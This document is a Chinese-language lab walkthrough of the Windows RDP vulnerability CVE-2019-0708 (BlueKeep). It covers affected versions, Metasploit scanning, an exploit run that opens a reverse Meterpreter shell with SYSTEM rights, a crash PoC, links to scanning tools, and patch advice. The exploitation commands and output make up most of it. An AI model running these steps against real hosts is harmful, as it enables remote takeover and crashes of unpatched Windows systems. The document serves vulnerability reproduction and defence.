CVE-2019-0708漏洞檢測利用
漏洞詳情
Windows系列伺服器於2019年5月15號,被爆出高危漏洞,該漏洞影響範圍較廣,漏洞利用方式是通過遠端桌面埠3389,RDP協議進行攻擊的。這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的勒索,永恆之藍病毒差不多。
漏洞影響版本
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 Edition SP2
- Windows 8和Windows 10及之後版本的使用者不受此漏洞影響
工具指令碼分享
連結:https://pan.baidu.com/s/1iGZcW1OxmrYvdJEBdjlSgA?pwd=e3hr
提取碼:e3hr
漏洞復現
1、復現環境
攻擊機kali:192.168.80.128
靶機windwos7:192.168.80.129
2、windwos7開啟遠端桌面
點選允許遠端訪問。
3、在kali中啟動msf,使用cve-2019-0708漏洞的掃描模板對靶機進行掃描。
msf6 > search 0708 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free 2 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution 3 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer msf6 > use 0 msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.80.129 rhosts => 192.168.80.129 msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
從掃描結果可以看到靶機存在該漏洞。
4、使用msf反彈shell
反彈shell的前提:靶機和攻擊機互通。
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > search 0708 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free 2 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution 3 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/browser/tumbleweed_filetransfer msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use 1 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.80.129 rhosts => 192.168.80.129 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.80.128 lhost => 192.168.80.128 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444 lport => 4444 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets Exploit targets: Id Name -- ---- 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15) 5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1) 6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) 7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS) 8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM) msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1 target => 1 msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Started reverse TCP handler on 192.168.80.128:4444 [*] 192.168.80.129:3389 - Running automatic check ("set AutoCheck false" to disable) [*] 192.168.80.129:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.80.129:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. [*] 192.168.80.129:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [!] 192.168.80.129:3389 - <---------------- | Entering Danger Zone | ----------------> [*] 192.168.80.129:3389 - Surfing channels ... [*] 192.168.80.129:3389 - Lobbing eggs ... [*] 192.168.80.129:3389 - Forcing the USE of FREE'd object ... [!] 192.168.80.129:3389 - <---------------- | Leaving Danger Zone | ----------------> [*] Sending stage (200774 bytes) to 192.168.80.129 [*] Meterpreter session 1 opened (192.168.80.128:4444 -> 192.168.80.129:49159) at 2022-12-12 15:16:09 +0800 meterpreter > shell Process 2580 created. Channel 1 created. Microsoft Windows [▒汾 6.1.7601] ▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒ C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
其中設定target需要根據靶機的屬性來原則,0代表自動根據指紋自動判斷情況(不太好用),1代表真實機器,2代表目標系統在virtualbox虛擬機器下執行,3、4、5代表代表目標系統在virtualbox虛擬機器下執行,6代表目標系統在Hyper-V虛擬機器下執行。如果用目標型號的targets利用不成功的話,就換其他的targets試一下(簡單來說就是多試試就行了)
注:攻擊 Windows 7 SP1 x64 與 Windows 2008 R2 x64的EXP不太穩定,針對 Windows 7 SP1 x64攻擊有藍屏現象。
批量檢測指令碼
windows下的python環境:
- 編輯3389_hosts,將待檢測的IP地址寫入檔案,一行一個
- 命令列切換到程式碼所在的目錄,執行python3 cve-2019-0708.py
藍屏
使用漏洞POC進行測試: POC:https://github.com/n1xbyte/CVE-2019-0708 用法:python3 crashpoc.py ip地址 系統型別
靶機已藍屏。
漏洞修復
及時打對應系統的安全補丁
關閉3389埠或新增防火牆安全策略限制對3389埠的訪問
參考
https://cloud.tencent.com/developer/article/2069868